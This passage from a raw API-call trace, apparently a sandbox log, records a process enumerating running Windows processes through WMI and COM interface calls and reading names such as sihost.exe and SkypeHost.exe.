[3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0264.230] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba308, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x661470) returned 0x0 [0264.230] WbemDefPath:IUnknown:Release (This=0x54ba308) returned 0x0 [0264.230] WbemDefPath:IUnknown:QueryInterface (in: This=0x661470, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x661470) returned 0x0 [0264.230] WbemDefPath:IUnknown:QueryInterface (in: This=0x661470, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0264.230] WbemDefPath:IUnknown:QueryInterface (in: This=0x661470, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0264.231] WbemDefPath:IUnknown:AddRef (This=0x661470) returned 0x3 [0264.231] WbemDefPath:IUnknown:QueryInterface (in: This=0x661470, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0264.231] WbemDefPath:IUnknown:QueryInterface (in: This=0x661470, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0264.231] WbemDefPath:IUnknown:QueryInterface (in: This=0x661470, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x661ec0) returned 0x0 [0264.231] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x661ec0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0264.231] WbemDefPath:IUnknown:Release (This=0x661ec0) returned 0x3 [0264.231] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0264.231] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0264.231] WbemDefPath:IUnknown:QueryInterface (in: This=0x661470, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0264.231] WbemDefPath:IUnknown:Release (This=0x661470) returned 0x2 [0264.231] WbemDefPath:IUnknown:Release (This=0x661470) returned 0x1 [0264.231] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0264.231] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0264.231] WbemDefPath:IUnknown:QueryInterface (in: This=0x661470, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x661470) returned 0x0 [0264.232] WbemDefPath:IUnknown:AddRef (This=0x661470) returned 0x3 [0264.232] WbemDefPath:IUnknown:Release (This=0x661470) returned 0x2 [0264.232] WbemDefPath:IWbemPath:SetText (This=0x661470, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1448\"") returned 0x0 [0264.232] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0264.232] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0264.232] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.232] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0264.232] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0264.232] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.232] IWbemClassObject:Get (in: This=0x6804a0, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23c4254*=0, plFlavor=0x23c4258*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="sihost.exe", varVal2=0x0), pType=0x23c4254*=8, plFlavor=0x23c4258*=0) returned 0x0 [0264.233] SysStringByteLen (bstr="sihost.exe") returned 0x14 [0264.233] SysStringByteLen (bstr="sihost.exe") returned 0x14 [0264.233] IWbemClassObject:Get (in: This=0x6804a0, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23c4254*=8, plFlavor=0x23c4258*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="sihost.exe", varVal2=0x0), pType=0x23c4254*=8, plFlavor=0x23c4258*=0) returned 0x0 [0264.233] SysStringByteLen (bstr="sihost.exe") returned 0x14 [0264.233] SysStringByteLen (bstr="sihost.exe") returned 0x14 [0264.233] CoTaskMemAlloc (cb=0x4) returned 0x54ba238 [0264.233] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba238, puReturned=0x23c1fd0 | out: apObjects=0x54ba238*=0x67fec8, puReturned=0x23c1fd0*=0x1) returned 0x0 [0264.234] IUnknown:QueryInterface (in: This=0x67fec8, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x67fec8) returned 0x0 [0264.235] IUnknown:QueryInterface (in: This=0x67fec8, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0264.235] IUnknown:QueryInterface (in: This=0x67fec8, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0264.235] IUnknown:QueryInterface (in: This=0x67fec8, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0264.235] IUnknown:AddRef (This=0x67fec8) returned 0x3 [0264.235] IUnknown:QueryInterface (in: This=0x67fec8, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0264.235] IUnknown:QueryInterface (in: This=0x67fec8, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0264.235] IUnknown:QueryInterface (in: This=0x67fec8, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x67fecc) returned 0x0 [0264.235] IMarshal:GetUnmarshalClass (in: This=0x67fecc, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0264.235] IUnknown:Release (This=0x67fecc) returned 0x3 [0264.235] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0264.235] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0264.235] IUnknown:QueryInterface (in: This=0x67fec8, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0264.235] IUnknown:Release (This=0x67fec8) returned 0x2 [0264.236] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0264.236] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0264.236] IUnknown:QueryInterface (in: This=0x67fec8, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x67fec8) returned 0x0 [0264.236] IUnknown:AddRef (This=0x67fec8) returned 0x4 [0264.236] IUnknown:Release (This=0x67fec8) returned 0x3 [0264.236] IUnknown:Release (This=0x67fec8) returned 0x2 [0264.236] CoTaskMemFree (pv=0x54ba238) [0264.236] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0264.236] IUnknown:AddRef (This=0x67fec8) returned 0x3 [0264.236] IWbemClassObject:Get (in: This=0x67fec8, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0264.236] IWbemClassObject:Get (in: This=0x67fec8, wszName="__PATH", lFlags=0, pVal=0x19f1b0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f234*=0, plFlavor=0x19f230*=0 | out: pVal=0x19f1b0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1708\"", varVal2=0x0), pType=0x19f234*=8, plFlavor=0x19f230*=64) returned 0x0 [0264.236] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1708\"") returned 0x5e [0264.236] SysStringByteLen (bstr="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1708\"") returned 0x5e [0264.236] CoGetObjectContext (in: riid=0x2232ee0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19f1dc | out: ppv=0x19f1dc*=0x601a94) returned 0x0 [0264.237] IComThreadingInfo:GetCurrentApartmentType (in: This=0x601a94, pAptType=0x19f1d4 | out: pAptType=0x19f1d4*=1) returned 0x0 [0264.237] IUnknown:QueryInterface (in: This=0x601a94, riid=0x2232ec8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x19f1d8 | out: ppvObject=0x19f1d8*=0x0) returned 0x80004002 [0264.237] IUnknown:Release (This=0x601a94) returned 0x1 [0264.238] CoGetClassObject (in: rclsid=0x6be02c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x6bfc54e0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x19eb48 | out: ppv=0x19eb48*=0x54ba388) returned 0x0 [0264.238] WbemDefPath:IUnknown:QueryInterface (in: This=0x54ba388, riid=0x6bf795e0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19ed60 | out: ppvObject=0x19ed60*=0x0) returned 0x80004002 [0264.238] WbemDefPath:IClassFactory:CreateInstance (in: This=0x54ba388, pUnkOuter=0x0, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19ed74 | out: ppvObject=0x19ed74*=0x661780) returned 0x0 [0264.238] WbemDefPath:IUnknown:Release (This=0x54ba388) returned 0x0 [0264.238] WbemDefPath:IUnknown:QueryInterface (in: This=0x661780, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e994 | out: ppvObject=0x19e994*=0x661780) returned 0x0 [0264.238] WbemDefPath:IUnknown:QueryInterface (in: This=0x661780, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e950 | out: ppvObject=0x19e950*=0x0) returned 0x80004002 [0264.238] WbemDefPath:IUnknown:QueryInterface (in: This=0x661780, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e544 | out: ppvObject=0x19e544*=0x0) returned 0x80004002 [0264.239] WbemDefPath:IUnknown:AddRef (This=0x661780) returned 0x3 [0264.239] WbemDefPath:IUnknown:QueryInterface (in: This=0x661780, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e2ac | out: ppvObject=0x19e2ac*=0x0) returned 0x80004002 [0264.239] WbemDefPath:IUnknown:QueryInterface (in: This=0x661780, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e25c | out: ppvObject=0x19e25c*=0x0) returned 0x80004002 [0264.239] WbemDefPath:IUnknown:QueryInterface (in: This=0x661780, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e268 | out: ppvObject=0x19e268*=0x662040) returned 0x0 [0264.239] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x662040, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e270 | out: pCid=0x19e270*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0264.239] WbemDefPath:IUnknown:Release (This=0x662040) returned 0x3 [0264.239] CoGetContextToken (in: pToken=0x19e2c8 | out: pToken=0x19e2c8) returned 0x0 [0264.239] CoGetContextToken (in: pToken=0x19e6d0 | out: pToken=0x19e6d0) returned 0x0 [0264.239] WbemDefPath:IUnknown:QueryInterface (in: This=0x661780, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e760 | out: ppvObject=0x19e760*=0x0) returned 0x80004002 [0264.239] WbemDefPath:IUnknown:Release (This=0x661780) returned 0x2 [0264.239] WbemDefPath:IUnknown:Release (This=0x661780) returned 0x1 [0264.239] CoGetContextToken (in: pToken=0x19f058 | out: pToken=0x19f058) returned 0x0 [0264.239] CoGetContextToken (in: pToken=0x19efb8 | out: pToken=0x19efb8) returned 0x0 [0264.239] WbemDefPath:IUnknown:QueryInterface (in: This=0x661780, riid=0x19f088*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x19f084 | out: ppvObject=0x19f084*=0x661780) returned 0x0 [0264.240] WbemDefPath:IUnknown:AddRef (This=0x661780) returned 0x3 [0264.240] WbemDefPath:IUnknown:Release (This=0x661780) returned 0x2 [0264.240] WbemDefPath:IWbemPath:SetText (This=0x661780, uMode=0x4, pszPath="\\\\XC64ZB\\root\\cimv2:Win32_Process.Handle=\"1708\"") returned 0x0 [0264.240] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f208 | out: puCount=0x19f208*=0x2) returned 0x0 [0264.240] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0x0, pszText=0x0 | out: puBuffLength=0x19f204*=0xf, pszText=0x0) returned 0x0 [0264.240] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f204*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f204*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.240] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6619b0, puCount=0x19f1d4 | out: puCount=0x19f1d4*=0x2) returned 0x0 [0264.240] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0x0, pszText=0x0 | out: puBuffLength=0x19f1d0*=0xf, pszText=0x0) returned 0x0 [0264.240] WbemDefPath:IWbemPath:GetText (in: This=0x6619b0, lFlags=4, puBuffLength=0x19f1d0*=0xf, pszText="00000000000000" | out: puBuffLength=0x19f1d0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0264.240] IWbemClassObject:Get (in: This=0x67fec8, wszName="Name", lFlags=0, pVal=0x19f1d0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23c4ae0*=0, plFlavor=0x23c4ae4*=0 | out: pVal=0x19f1d0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SkypeHost.exe", varVal2=0x0), pType=0x23c4ae0*=8, plFlavor=0x23c4ae4*=0) returned 0x0 [0264.240] SysStringByteLen (bstr="SkypeHost.exe") returned 0x1a [0264.240] SysStringByteLen (bstr="SkypeHost.exe") returned 0x1a [0264.240] IWbemClassObject:Get (in: This=0x67fec8, wszName="Name", lFlags=0, pVal=0x19f1d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x23c4ae0*=8, plFlavor=0x23c4ae4*=0 | out: pVal=0x19f1d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SkypeHost.exe", varVal2=0x0), pType=0x23c4ae0*=8, plFlavor=0x23c4ae4*=0) returned 0x0 [0264.240] SysStringByteLen (bstr="SkypeHost.exe") returned 0x1a [0264.240] SysStringByteLen (bstr="SkypeHost.exe") returned 0x1a [0264.241] CoTaskMemAlloc (cb=0x4) returned 0x54ba238 [0264.241] IEnumWbemClassObject:Next (in: This=0x663848, lTimeout=-1, uCount=0x1, apObjects=0x54ba238, puReturned=0x23c1fd0 | out: apObjects=0x54ba238*=0x550bc18, puReturned=0x23c1fd0*=0x1) returned 0x0 [0264.242] IUnknown:QueryInterface (in: This=0x550bc18, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e840 | out: ppvObject=0x19e840*=0x550bc18) returned 0x0 [0264.242] IUnknown:QueryInterface (in: This=0x550bc18, riid=0x6c04fdcc*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x19e7fc | out: ppvObject=0x19e7fc*=0x0) returned 0x80004002 [0264.242] IUnknown:QueryInterface (in: This=0x550bc18, riid=0x6c04fb20*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x19e61c | out: ppvObject=0x19e61c*=0x0) returned 0x80004002 [0264.242] IUnknown:QueryInterface (in: This=0x550bc18, riid=0x6c05056c*(Data1=0xaf86e2e0, Data2=0xb12d, Data3=0x4c6a, Data4=([0]=0x9c, [1]=0x5a, [2]=0xd7, [3]=0xaa, [4]=0x65, [5]=0x10, [6]=0x1e, [7]=0x90)), ppvObject=0x19e3f4 | out: ppvObject=0x19e3f4*=0x0) returned 0x80004002 [0264.242] IUnknown:AddRef (This=0x550bc18) returned 0x3 [0264.242] IUnknown:QueryInterface (in: This=0x550bc18, riid=0x6c050208*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x19e15c | out: ppvObject=0x19e15c*=0x0) returned 0x80004002 [0264.242] IUnknown:QueryInterface (in: This=0x550bc18, riid=0x6c05015c*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x19e10c | out: ppvObject=0x19e10c*=0x0) returned 0x80004002 [0264.242] IUnknown:QueryInterface (in: This=0x550bc18, riid=0x6bf240e8*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e118 | out: ppvObject=0x19e118*=0x550bc1c) returned 0x0 [0264.242] IMarshal:GetUnmarshalClass (in: This=0x550bc1c, riid=0x6bf16c6c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x19e120 | out: pCid=0x19e120*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0264.242] IUnknown:Release (This=0x550bc1c) returned 0x3 [0264.242] CoGetContextToken (in: pToken=0x19e178 | out: pToken=0x19e178) returned 0x0 [0264.242] CoGetContextToken (in: pToken=0x19e580 | out: pToken=0x19e580) returned 0x0 [0264.242] IUnknown:QueryInterface (in: This=0x550bc18, riid=0x6c050448*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x19e610 | out: ppvObject=0x19e610*=0x0) returned 0x80004002 [0264.243] IUnknown:Release (This=0x550bc18) returned 0x2 [0264.243] CoGetContextToken (in: pToken=0x19eb50 | out: pToken=0x19eb50) returned 0x0 [0264.243] CoGetContextToken (in: pToken=0x19eab0 | out: pToken=0x19eab0) returned 0x0 [0264.243] IUnknown:QueryInterface (in: This=0x550bc18, riid=0x19eb80*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x19eb7c | out: ppvObject=0x19eb7c*=0x550bc18) returned 0x0 [0264.243] IUnknown:AddRef (This=0x550bc18) returned 0x4 [0264.243] IUnknown:Release (This=0x550bc18) returned 0x3 [0264.243] IUnknown:Release (This=0x550bc18) returned 0x2 [0264.243] CoTaskMemFree (pv=0x54ba238) [0264.243] CoGetContextToken (in: pToken=0x19eeb8 | out: pToken=0x19eeb8) returned 0x0 [0264.243] IUnknown:AddRef (This=0x550bc18) returned 0x3 [0264.243] IWbemClassObject:Get (in: This=0x550bc18, wszName="__GENUS", lFlags=0, pVal=0x19f1cc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x19f24c*=0, plFlavor=0x19f248*=0 | out: pVal=0x19f1cc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x19f24c*=3, plFlavor=0x19f248*=64) returned 0x0 [0264.243] 